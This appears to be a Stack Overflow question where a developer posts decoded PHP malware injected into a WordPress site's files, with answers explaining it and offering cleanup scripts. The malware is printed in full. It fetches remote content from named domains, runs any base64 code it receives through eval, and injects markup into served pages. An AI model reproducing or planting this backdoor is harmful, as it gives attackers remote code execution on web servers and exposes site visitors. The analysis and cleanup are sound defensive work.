# What exactly does this PHP exploit code (found on my app)?

Tags: php, exploit

I've found this code in base 64 on all php files of one of my client's site (wordpress) and I'm trying to understand what it does.

I'm also trying to figure out if it was an application exploit or a direct FTP access that has past this code.

Everything starts with `setup_globals_777()` and `ob_start('mrobh')` setting the callback to the `mrobh($content)` function.

Then there are a call to `gzdecodeit ($decode)` where the hassle starts out.

It seems like it gets the page content and change it. Now I'm trying to detect the specific changes and understand all functions, including the second one `gzdecodeit()`.

Can someone shed some light on it?

**The calls**

```
setup_globals_777();
ob_start('mrobh');
// Here the application code and html output starts out
```

**The callback:**

```
function mrobh ($content)
{
    @Header('Content-Encoding: none');
    $decoded_content = gzdecodeit($content);
    if (preg_match('/\<\/body/si', $decoded_content)) {
        return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1',
                            $decoded_content);
    } else {
        return $decoded_content . gml_777();
    }
}
```

**The setup function (understandable)**

```
function setup_globals_777 ()
{
    $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
    $mz = "/tmp/";
    if (! is_dir($rz)) {
        @mkdir($rz);
        if (is_dir($rz)) {
            $mz = $rz;
        } else {
            $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
            if (! is_dir($rz)) {
                @mkdir($rz);
                if (is_dir($rz)) {
                    $mz = $rz;
                }
            } else {
                $mz = $rz;
            }
        }
    } else {
        $mz = $rz;
    }
    $bot = 0;
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
        $bot = 1;
    if (stristr($ua, "bingbot") || stristr($ua, "google"))
        $bot = 1;
    $msie = 0;
    if (is_msie_777($ua))
        $msie = 1;
    $mac = 0;
    if (is_mac_777($ua))
        $mac = 1;
    if (($msie == 0) && ($mac == 0))
        $bot = 1;
    global $_SERVER;
    $_SERVER['s_p1'] = $mz;
    $_SERVER['s_b1'] = $bot;
    $_SERVER['s_t1'] = 1200;
    $_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
    $d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
     urlencode($_SERVER["PHP_SELF"]) . "&a=" .
     urlencode($_SERVER["HTTP_USER_AGENT"]);
    $_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
    $_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
    $_SERVER['s_script'] = "mm.php?d=1";
}
```

**The first function called after the callback execution:**

> Here is where the magic happens. I can't see the calls for the other
>   available functions  and understand what this function is actually
>   decoding, since the `$decode` var is the application output grabbed by
>   the `ob_start()`

```
function gzdecodeit ($decode)
{
    $t = @ord(@substr($decode, 3, 1));
    $start = 10;
    $v = 0;
    if ($t & 4) {
        $str = @unpack('v', substr($decode, 10, 2));
        $str = $str[1];
        $start += 2 + $str;
    }
    if ($t & 8) {
        $start = @strpos($decode, chr(0), $start) + 1;
    }
    if ($t & 16) {
        $start = @strpos($decode, chr(0), $start) + 1;
    }
    if ($t & 2) {
        $start += 2;
    }
    $ret = @gzinflate(@substr($decode, $start));
    if ($ret === FALSE) {
        $ret = $decode;
    }
    return $ret;
}
```

**All the available functions (after a `base64_decode()`):**

```
<?php
if (function_exists('ob_start') && ! isset($_SERVER['mr_no'])) {
    $_SERVER['mr_no'] = 1;
    if (! function_exists('mrobh')) {
        function get_tds_777 ($url)
        {
            $content = "";
            $content = @trycurl_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfile_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfopen_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfsockopen_777($url);
            if ($content !== false)
                return $content;
            $content = @trysocket_777($url);
            if ($content !== false)
                return $content;
            return '';
        }
        function trycurl_777 ($url)
        {
            if (function_exists('curl_init') === false)
                return false;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result == "")
                return false;
            return $result;
        }
        function tryfile_777 ($url)
        {
            if (function_exists('file') === false)
                return false;
            $inc = @file($url);
            $buf = @implode('', $inc);
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfopen_777 ($url)
        {
            if (function_exists('fopen') === false)
                return false;
            $buf = '';
            $f = @fopen($url, 'r');
            if ($f) {
                while (! feof($f)) {
                    $buf .= fread($f, 10000);
                }
                fclose($f);
            } else
                return false;
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfsockopen_777 ($url)
        {
            if (function_exists('fsockopen') === false)
                return false;
            $p = @parse_url($url);
            $host = $p['host'];
            $uri = $p['path'] . '?' . $p['query'];
            $f = @fsockopen($host, 80, $errno, $errstr, 30);
            if (! $f)
                return false;
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            fwrite($f, $request);
            $buf = '';
            while (! feof($f)) {
                $buf .= fread($f, 10000);
            }
            fclose($f);
            if ($buf == "")
                return false;
            list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), 
            $buf);
            return $buf;
        }
        function trysocket_777 ($url)
        {
            if (function_exists('socket_create') === false)
                return false;
            $p = @parse_url($url);
            $host = $p['host'];
            $uri = $p['path'] . '?' . $p['query'];
            $ip1 = @gethostbyname($host);
            $ip2 = @long2ip(@ip2long($ip1));
            if ($ip1 != $ip2)
                return false;
            $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if (! @socket_connect($sock, $ip1, 80)) {
                @socket_close($sock);
                return false;
            }
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            socket_write($sock, $request);
            $buf = '';
            while ($t = socket_read($sock, 10000)) {
                $buf .= $t;
            }
            @socket_close($sock);
            if ($buf == "")
                return false;
            list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), 
            $buf);
            return $buf;
        }
        function update_tds_file_777 ($tdsfile)
        {
            $actual1 = $_SERVER['s_a1'];
            $actual2 = $_SERVER['s_a2'];
            $val = get_tds_777($actual1);
            if ($val == "")
                $val = get_tds_777($actual2);
            $f = @fopen($tdsfile, "w");
            if ($f) {
                @fwrite($f, $val);
                @fclose($f);
            }
            if (strstr($val, "|||CODE|||")) {
                list ($val, $code) = explode("|||CODE|||", $val);
                eval(base64_decode($code));
            }
            return $val;
        }
        function get_actual_tds_777 ()
        {
            $defaultdomain = $_SERVER['s_d1'];
            $dir = $_SERVER['s_p1'];
            $tdsfile = $dir . "log1.txt";
            if (@file_exists($tdsfile)) {
                $mtime = @filemtime($tdsfile);
                $ctime = time() - $mtime;
                if ($ctime > $_SERVER['s_t1']) {
                    $content = update_tds_file_777($tdsfile);
                } else {
                    $content = @file_get_contents($tdsfile);
                }
            } else {
                $content = update_tds_file_777($tdsfile);
            }
            $tds = @explode("\n", $content);
            $c = @count($tds) + 0;
            $url = $defaultdomain;
            if ($c > 1) {
                $url = trim($tds[mt_rand(0, $c - 2)]);
            }
            return $url;
        }
        function is_mac_777 ($ua)
        {
            $mac = 0;
            if (stristr($ua, "mac") || stristr($ua, "safari"))
                if ((! stristr($ua, "windows")) && (! stristr($ua, "iphone")))
                    $mac = 1;
            return $mac;
        }
        function is_msie_777 ($ua)
        {
            $msie = 0;
            if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") ||
             stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
                $msie = 1;
            return $msie;
        }
        function setup_globals_777 ()
        {
            $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
            $mz = "/tmp/";
            if (! is_dir($rz)) {
                @mkdir($rz);
                if (is_dir($rz)) {
                    $mz = $rz;
                } else {
                    $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
                    if (! is_dir($rz)) {
                        @mkdir($rz);
                        if (is_dir($rz)) {
                            $mz = $rz;
                        }
                    } else {
                        $mz = $rz;
                    }
                }
            } else {
                $mz = $rz;
            }
            $bot = 0;
            $ua = $_SERVER['HTTP_USER_AGENT'];
            if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
                $bot = 1;
            if (stristr($ua, "bingbot") || stristr($ua, "google"))
                $bot = 1;
            $msie = 0;
            if (is_msie_777($ua))
                $msie = 1;
            $mac = 0;
            if (is_mac_777($ua))
                $mac = 1;
            if (($msie == 0) && ($mac == 0))
                $bot = 1;
            global $_SERVER;
            $_SERVER['s_p1'] = $mz;
            $_SERVER['s_b1'] = $bot;
            $_SERVER['s_t1'] = 1200;
            $_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
            $d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
             urlencode($_SERVER["PHP_SELF"]) . "&a=" .
             urlencode($_SERVER["HTTP_USER_AGENT"]);
            $_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
            $_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
            $_SERVER['s_script'] = "mm.php?d=1";
        }


        if (! function_exists('gml_777')) {
            function gml_777 ()
            {
                $r_string_777 = '';
                if ($_SERVER['s_b1'] == 0)
                    $r_string_777 = '';
                return $r_string_777;
            }
        }
        if (! function_exists('gzdecodeit')) {
            function gzdecodeit ($decode)
            {
                $t = @ord(@substr($decode, 3, 1));
                $start = 10;
                $v = 0;
                if ($t & 4) {
                    $str = @unpack('v', substr($decode, 10, 2));
                    $str = $str[1];
                    $start += 2 + $str;
                }
                if ($t & 8) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 16) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 2) {
                    $start += 2;
                }
                $ret = @gzinflate(@substr($decode, $start));
                if ($ret === FALSE) {
                    $ret = $decode;
                }
                return $ret;
            }
        }
        function mrobh ($content)
        {
            @Header('Content-Encoding: none');
            $decoded_content = gzdecodeit($content);
            if (preg_match('/\<\/body/si', $decoded_content)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', 
                gml_777() . "\n" . '$1', $decoded_content);
            } else {
                return $decoded_content . gml_777();
            }
        }

    }
}
```

Comment: I would worry to fix your security instead to understand what this code does

Comment: @yes123 Yes, but I'm asking about the code. I would like to understand it. I'm a PHP programmer and haven't see those statements combinations before.

Comment: Not sure if this is the same thing or not, but you may want to have a look: http://www.tumblr.com/tagged/hack?before=1329947869

Comment: Looks like it adds crap to the page -- probably ads, links to other malware, etc..

Comment: @summea There isn't any down vote. What actually happened is that I have chosen the other answer as the right one, since it explains the code in more details. I up voted your answer as it contains useful information. This is why you have lose rep.

Answer (score 7, accepted):

Looks like it creates a hidden .log folder:

```
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
    @mkdir($rz);
    if (is_dir($rz)) {
        $mz = $rz;
    } else {
        $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
        if (! is_dir($rz)) {
            @mkdir($rz);
            if (is_dir($rz)) {
                $mz = $rz;
            }
        } else {
            $mz = $rz;
        }
    }
} else {
    $mz = $rz;
}
```

Then seems to download code from http://www.lolypopholypop.com/g_load.php and http://sweepstakesandcontestsdo.com/, base64 decodes it, then executes it:

```
function update_tds_file_777 ($tdsfile)
    {
        $actual1 = $_SERVER['s_a1'];
        $actual2 = $_SERVER['s_a2'];
        $val = get_tds_777($actual1);
        if ($val == "")
            $val = get_tds_777($actual2);
        $f = @fopen($tdsfile, "w");
        if ($f) {
            @fwrite($f, $val);
            @fclose($f);
        }
        if (strstr($val, "|||CODE|||")) {
            list ($val, $code) = explode("|||CODE|||", $val);
            eval(base64_decode($code));
        }
        return $val;
    }
```

So without having to access your server again, they can execute different code.

Comment: Can you point out where the update_tds_file_777() first call occurs?

Comment: I'm not sure, is all the code posted above? Because get_actual_tds_777() never gets called, either, that I can see.

Comment: Yes, it is. This is the reason I thought that the gzdecodeit() was doing something.

Comment: gzdecodeit just seems to parse and decodes the content its passed. It's kind of interesting to me how they're doing it. Looks like the decode algorithm changes based off the ascii value of the third character. I'm not sure how those other functions are called then. Also, always inflates the data. See http://php.net/manual/en/function.ord.php and http://php.net/manual/en/function.gzinflate.php and http://php.net/manual/en/function.unpack.php for more information on the functions used.

Answer (score 5):

[Dan Hill](http://danhilltech.tumblr.com/) wrote an [article](http://www.tumblr.com/tagged/hack?before=1329947869) about getting base64 hacked for WordPress installations.

To quote the results of Dan's findings:

> The hack I found essentially created a new php file in the uploads folder of Wordpress that allowed remote filesystem control, and then modified the pages being served (every .php file) to include a script tag redirecting visitors to some dodgy sites.

*To get rid of the problem, [Dan](http://danhilltech.tumblr.com/) tried the following:*

---

I did this in three stages. First, find any world-writable directories (tsk tsk):

```
find . -type d -perm -o=w
```

And make them not world writable:

```
find . -type d -perm -o=w -print -exec chmod 770 {} \;
```

Delete all the new files these guys created:

```
find . -wholename '*wp-content/uploads/*.php' -exec rm -rf {} \;
```

(In wordpress, the uploads folder shouldn’t contain any PHP)

Stage two, repair all your infected PHP files. I played around using sed and xargs for this, but eventually gave up and wrote a quick ruby script to do the job. Run this run this ruby script from your root directory:

```
#!/usr/bin/env ruby
Dir.glob('**/*.php').each do|f|
    puts f
    begin
        contents = File.read(f)
        contents =  contents.gsub(/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/, "")

        File.open(f, 'w') {|f| f.write(contents) }
    rescue
        puts "FILE ERROR"
    end
end
```

The final step is to upgrade all your old, forgotten about Wordpress installs to prevent any other vulnerabilities showing up. The bonus step for good luck is to reset your passwords, especially any MySQL passwords stored in plain text in your wp-config.php file.

---

Hope Dan's findings help!

Answer (score 1):

For those searching for a non-Ruby fix, here's a PHP version of Dan Hill's code:

```
<?php
function fileExtension($filename) {
    $pathInfo = pathinfo($filename);
    return strtolower($pathInfo['extension']);
}

function fixFiles($path) {
    $path = str_replace('././', './', $path);
    $d = @opendir($path);

    if ($d) {
        while (($entry = readdir($d)) !== false) {
            $baseEntry = $entry;
            $entry = str_replace('././', './', $path . '/' . $entry);

            if ($baseEntry != '.' && $baseEntry != '..') {
                if (is_file($entry)) {
                    $fe = fileExtension($entry);

                    if ($fe == 'php') {
                        $contents = file_get_contents($entry);
                        $contents = preg_replace("/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/", '', $contents);

                        $f = fopen($entry, 'w');
                        fputs($f, $contents);
                        fclose($f);

                        echo $entry . '<br>';
                        flush();
                    }
                }
                else if (is_dir($entry)) {
                    fixFiles($path . '/' . basename($entry));
                }
            }
        }

        closedir($d);
    }
}

fixFiles('.');
?>
```